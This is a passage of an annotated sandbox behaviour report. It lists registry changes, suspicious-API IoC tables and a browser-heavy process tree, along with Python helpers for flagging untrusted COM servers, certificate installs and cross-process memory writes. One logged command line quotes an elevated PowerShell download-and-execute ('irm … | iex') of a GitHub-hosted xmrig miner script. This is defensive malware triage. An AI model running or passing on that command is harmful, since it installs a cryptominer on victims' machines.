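    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E3D94CEB-EC11-46BE-8872-7DDCE37FABFA}\InprocHandler32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.171.39\\psmachine_64.dll" MicrosoftEdgeUpdateComRegisterShell64.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D1E8B1A6-32CE-443C-8E2E-EBA90C481353}\LocalServer32\ = "\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.171.39\\MicrosoftEdgeUpdateBroker.exe\"" MicrosoftEdgeUpdate.exe',
    # hypothetical rows, constructed for the example:
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DEADBEEF-0000-4000-8000-000000000001}\InprocServer32\ = "C:\\Users\\Public\\Libraries\\notreal.dll" notreal.exe',
    r'Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\0123456789ABCDEF0123456789ABCDEF01234567\Blob = 0300000001000000 notreal.exe',
])

# COM server registration: CLSID\{guid}\<LocalServer32|InprocServer32|InprocHandler32>\ = "<value>" <process>
# The value keeps the report's C-style escaping (\\ for a backslash, \" for a quote).
COM_RE = re.compile(
    r'\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\(?:WOW6432Node\\)?CLSID\\'
    r'\{(?P<clsid>[0-9A-Fa-f-]{36})\}\\(?P<sub>LocalServer32|InprocServer32|InprocHandler32)\\'
    r' = "(?P<val>(?:\\.|[^"\\])*)" (?P<proc>\S+)'
)

# Certificate install: a Blob value under <store>\Certificates\<40 hex chars>.
CERT_RE = re.compile(
    r'Set value \(\w+\) \\REGISTRY\\\S*?\\SystemCertificates\\'
    r'(?P<store>Root|AuthRoot|TrustedPeople|Disallowed|CA)\\Certificates\\'
    r'(?P<thumb>[0-9A-Fa-f]{40})\\Blob = (?P<blob>\S+) (?P<proc>\S+)',
    re.IGNORECASE,
)

# Assumption for the example: server binaries are expected under these roots only.
TRUSTED_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")


def unescape(value):
    """Undo the report's C-style escaping of backslashes and quotes."""
    return re.sub(r'\\(.)', r'\1', value)


def server_path(value):
    """Extract the binary path from a server value; a quoted path may carry arguments."""
    v = unescape(value)
    if v.startswith('"'):
        return v[1:v.index('"', 1)]
    return v  # caveat: an unquoted path with arguments is returned whole


def com_servers(text):
    """All COM server registrations in the text, as dicts."""
    return [dict(clsid=m["clsid"].upper(), sub=m["sub"], path=server_path(m["val"]), proc=m["proc"])
            for m in COM_RE.finditer(text)]


def untrusted_com_servers(text):
    """Registrations whose server binary lives outside the trusted roots."""
    return [r for r in com_servers(text) if not r["path"].lower().startswith(TRUSTED_ROOTS)]


def cert_blob_writes(text):
    """Certificate blobs actually written into a store (Key created alone does not count)."""
    return [dict(store=m["store"].upper(), thumbprint=m["thumb"].upper(), proc=m["proc"])
            for m in CERT_RE.finditer(text)]


if __name__ == "__main__":
    for r in com_servers(ROWS):
        print("COM", r["sub"], r["clsid"], r["path"], "by", r["proc"])
    print("untrusted:", [r["clsid"] for r in untrusted_com_servers(ROWS)])
    print("cert blobs:", cert_blob_writes(ROWS))
```

On the page's own rows the first check returns only the two Edge Update servers under Program Files (x86) and the second returns nothing; the two constructed rows are what a real hit would look like.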
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid | Process
2372 | RobloxStudioBeta.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process (hits, totalled per process over the 64 rows)
2680 | taskmgr.exe (15)
1452 | chrome.exe (2)
4880 | chrome.exe (2)
1852 | RobloxPlayerInstaller.exe (2)
4872 | MicrosoftEdgeUpdate.exe (6)
3932 | chrome.exe (2)
580 | taskmgr.exe (33)
596 | RobloxPlayerBeta.exe (2)
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid | Process
2372 | RobloxStudioBeta.exe
Suspicious behavior: MapViewOfSection 4 IoCs
pid | Process
4232 | MicrosoftEdgeCP.exe (4 hits)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
pid | Process
1452 | chrome.exe (3 hits)
4880 | chrome.exe (7 hits)
2764 | msedgewebview2.exe (3 hits)
Suspicious use of AdjustPrivilegeToken 64 IoCs
description | pid | Process (hits, totalled over the 64 rows)
Token: SeDebugPrivilege | 652 | MicrosoftEdgeCP.exe (4)
Token: SeDebugPrivilege | 432 | MicrosoftEdgeCP.exe (3)
Token: SeDebugPrivilege | 3472 | MicrosoftEdge.exe (2)
Token: SeDebugPrivilege | 2680 | taskmgr.exe (1)
Token: SeSystemProfilePrivilege | 2680 | taskmgr.exe (1)
Token: SeCreateGlobalPrivilege | 2680 | taskmgr.exe (1)
Token: 33 | 2680 | taskmgr.exe (1) (the report shows the raw privilege LUID; 33 is SeIncreaseWorkingSetPrivilege)
Token: SeIncBasePriorityPrivilege | 2680 | taskmgr.exe (1)
Token: SeDebugPrivilege | 4916 | firefox.exe (2)
Token: SeShutdownPrivilege | 1452 | chrome.exe (4)
Token: SeCreatePagefilePrivilege | 1452 | chrome.exe (4)
Token: SeShutdownPrivilege | 4880 | chrome.exe (20)
Token: SeCreatePagefilePrivilege | 4880 | chrome.exe (20)
Every row in this table belongs to a browser process or to Task Manager; none is attributed to a PowerShell process.
Suspicious use of FindShellTrayWindow 64 IoCs
pid | Process (hits, totalled over the 64 rows)
2680 | taskmgr.exe (41)
4916 | firefox.exe (4)
1452 | chrome.exe (19)
Suspicious use of SendNotifyMessage 64 IoCs
pid | Process (hits, totalled over the 64 rows)
2680 | taskmgr.exe (40)
4916 | firefox.exe (3)
1452 | chrome.exe (21)
Suspicious use of SetWindowsHookEx 6 IoCs
pid | Process
3472 | MicrosoftEdge.exe
4232 | MicrosoftEdgeCP.exe
652 | MicrosoftEdgeCP.exe
4232 | MicrosoftEdgeCP.exe
4916 | firefox.exe
2372 | RobloxStudioBeta.exe
Suspicious use of UnmapMainImage 4 IoCs
pid | Process
596 | RobloxPlayerBeta.exe
592 | RobloxPlayerBeta.exe
4844 | RobloxPlayerBeta.exe
4508 | RobloxPlayerBeta.exe
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target (hits, totalled over the 64 rows)
PID 4232 wrote to memory of 432 | 4232 | MicrosoftEdgeCP.exe | 78 (6)
PID 3348 wrote to memory of 4916 | 3348 | firefox.exe | 82 (11)
PID 4916 wrote to memory of 4812 | 4916 | firefox.exe | 83 (2)
PID 4916 wrote to memory of 4952 | 4916 | firefox.exe | 84 (45)
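An added example, not code from tria.ge: the 64 WriteProcessMemory rows above repeat only four writer/target pairs, and three of them are a parent writing into a child it has just created (firefox.exe 3348 into 4916, and 4916 into its content processes), which is what process start-up looks like in a sandbox trace. The Python below, written for this page, collapses the rows to unique edges, rebuilds parent links from the depth markers in the Processes section, and separates parent-to-child writes from writes between processes the tree does not link; here that leaves 4232 into 432, both listed at the top level, as the one edge to look at first. The sample rows and the TREE list are transcribed from this page and only cover the processes the page shows, so the parent map is partial and the cross-process bucket is a prompt for a closer look, not a finding of injection.

```python
import re
from collections import Counter

# Constructed sample: a subset of the rows from the report's "Suspicious use of
# WriteProcessMemory" table, in the same flattened form the page uses.
WPM_ROWS = (
    "PID 4232 wrote to memory of 432 4232 MicrosoftEdge CP.exe 78 "
    "PID 4232 wrote to memory of 432 4232 MicrosoftEdgeCP.exe 78 "
    "PID 3348 wrote to memory of 4916 3348 firefox.exe 82 "
    "PID 3348 wrote to memory of 4916 3348 firefox.exe 82 "
    "PID 4916 wrote to memory of 4812 4916 firefox.exe 83 "
    "PID 4916 wrote to memory of 4952 4916 firefox.exe 84 "
    "PID 4916 wrote to memory of 4952 4916 firefox.exe 84"
).replace("MicrosoftEdge CP.exe", "MicrosoftEdgeCP.exe")

# Process tree transcribed from the report's Processes section as (depth, image, pid),
# in listing order; depth 1 is a top-level process. Only the entries shown on the page.
TREE = [
    (1, "MicrosoftEdgeCP.exe", 4232),
    (1, "MicrosoftEdgeCP.exe", 652),
    (1, "MicrosoftEdgeCP.exe", 432),
    (1, "firefox.exe", 3348),
    (2, "firefox.exe", 4916),
    (3, "firefox.exe", 4812),
    (3, "firefox.exe", 4952),
    (3, "firefox.exe", 1484),
]

# Row layout: "PID <writer> wrote to memory of <target>" <pid> <Process> <procid_target>
ROW_RE = re.compile(r"PID (\d+) wrote to memory of (\d+) \d+ (\S+) \d+")


def write_edges(text):
    """Collapse repeated rows into (writer pid, writer image, target pid) -> hit count."""
    counts = Counter()
    for writer, target, image in ROW_RE.findall(text):
        counts[(int(writer), image, int(target))] += 1
    return counts


def parent_map(tree):
    """Rebuild pid -> parent pid from a depth-ordered listing (None for top-level)."""
    parents, stack = {}, []
    for depth, _image, pid in tree:
        while stack and stack[-1][0] >= depth:
            stack.pop()
        parents[pid] = stack[-1][1] if stack else None
        stack.append((depth, pid))
    return parents


def classify_edges(edges, parents):
    """Split edges into parent->child writes (normal at process start-up) and writes
    between processes the tree does not link, which deserve a closer look."""
    expected, cross = {}, {}
    for edge, n in edges.items():
        writer, _image, target = edge
        (expected if parents.get(target) == writer else cross)[edge] = n
    return expected, cross


def triage(text=WPM_ROWS, tree=TREE):
    return classify_edges(write_edges(text), parent_map(tree))


if __name__ == "__main__":
    expected, cross = triage()
    for edge, n in expected.items():
        print("parent->child  ", edge, "x", n)
    for edge, n in cross.items():
        print("cross-process  ", edge, "x", n)
```

The parent map only knows what the listing shows; a process the page lists at the top level may still have a real parent the tree does not render (Edge content processes are brokered rather than spawned directly), which is exactly why the cross-process bucket is a queue for review rather than a verdict.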
System policy modification 1 TTPs 1 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection | msedgewebview2.exe
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times. The report attaches no IoC (process, task name or path) to this signature, so it cannot be tied to a specific process from this page.
Processes
The target string was submitted as a URL (note the http:// prefix), so the sandbox handed it to LaunchWinApp.exe, which opens URLs in the default browser; it was never executed as a PowerShell command line, and no IoC on this page is attributed to a PowerShell process. Nesting below follows the report's depth markers.
C:\Windows\system32\LaunchWinApp.exe
  cmdline: "C:\Windows\system32\LaunchWinApp.exe" "http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex"
  - Access Token Manipulation: Create Process with Token
  PID:1640
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
  cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
  - Drops file in Windows directory
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:3472
C:\Windows\system32\browser_broker.exe
  cmdline: C:\Windows\system32\browser_broker.exe -Embedding
  - Modifies Internet Explorer settings
  PID:1428
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4232
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Drops file in Windows directory
  - Modifies Internet Explorer settings
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:652
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Drops file in Windows directory
  - Modifies Internet Explorer settings
  - Suspicious use of AdjustPrivilegeToken
  PID:432
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2680
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3348 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4916 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.0.253263564\1666715509" -parentBuildID 20221007134813 -prefsHandle 1736 -prefMapHandle 1716 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0b1bc83-3f1d-4686-8068-cb4024606cd8} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 1824 20cfe9ce158 gpu3⤵PID:4812
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.1.2105767407\1393510733" -parentBuildID 20221007134813 -prefsHandle 2168 -prefMapHandle 2156 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eff2cd15-9b23-46a3-9cff-769ca4695bf4} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 2180 20cfe8fb358 socket3⤵
- Checks processor information in registry
PID:4952
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.2.1072239049\118926637" -childID 1 -isForBrowser -prefsHandle 3124 -prefMapHandle 3120 -prefsLen 20866 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9d4b5d16-f731-455b-b64c-a9aeda37f31c} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 3136 20c87311558 tab3⤵PID:1484
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.3.1333361495\869113507" -childID 2 -isForBrowser -prefsHandle 3396 -prefMapHandle 3376 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {07302cb8-e27d-49af-a573-06849357c768} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 3408 20c877dab58 tab3⤵PID:2252
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.4.1818201270\1027860085" -childID 3 -isForBrowser -prefsHandle 4336 -prefMapHandle 4324 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e5539895-a374-4540-97db-07a54d9f5c89} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 3456 20c88383c58 tab3⤵PID:3452
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.5.1089039125\1913300989" -childID 4 -isForBrowser -prefsHandle 2624 -prefMapHandle 4832 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {48f6a0e0-2593-43ae-827b-b70ebd43c0eb} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 4812 20c895e6558 tab3⤵PID:208
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.6.901914592\1157740721" -childID 5 -isForBrowser -prefsHandle 5056 -prefMapHandle 5060 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6a951b25-98a4-4879-94eb-9ff815ffedd9} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 5048 20c8a226858 tab3⤵PID:4944
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.7.508253332\1059688177" -childID 6 -isForBrowser -prefsHandle 5240 -prefMapHandle 5244 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e1b9deee-dadd-4bdc-9f4b-e0dee4e52a84} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 5236 20c8a225058 tab3⤵PID:2972
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1452 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffde1649758,0x7ffde1649768,0x7ffde16497782⤵PID:1700
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1660 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:22⤵PID:4104
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:82⤵PID:1432
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2100 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:82⤵PID:2404
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2972 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:12⤵PID:4208
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2988 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:12⤵PID:4520
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4528 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:12⤵PID:2080
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4700 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:82⤵PID:508
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4772 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:82⤵PID:1120
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4472 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:82⤵PID:1200
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4472 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:82⤵PID:3452
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4484 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:82⤵PID:1444
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:1560
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
PID:4880 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffde1649758,0x7ffde1649768,0x7ffde16497782⤵PID:4624
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1528 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:22⤵PID:3064
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:82⤵PID:3544
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2056 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:82⤵PID:696
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2860 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:12⤵PID:3252
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2872 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:12⤵PID:2356
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4488 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:12⤵PID:2604
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4496 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:82⤵PID:3048
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4764 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:82⤵PID:4796
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4820 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:82⤵PID:3440
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4640 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:82⤵PID:4568
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4712 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:82⤵PID:2736
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5180 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:12⤵PID:3776
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3452 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:12⤵PID:4080
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:82⤵PID:3224
-
-
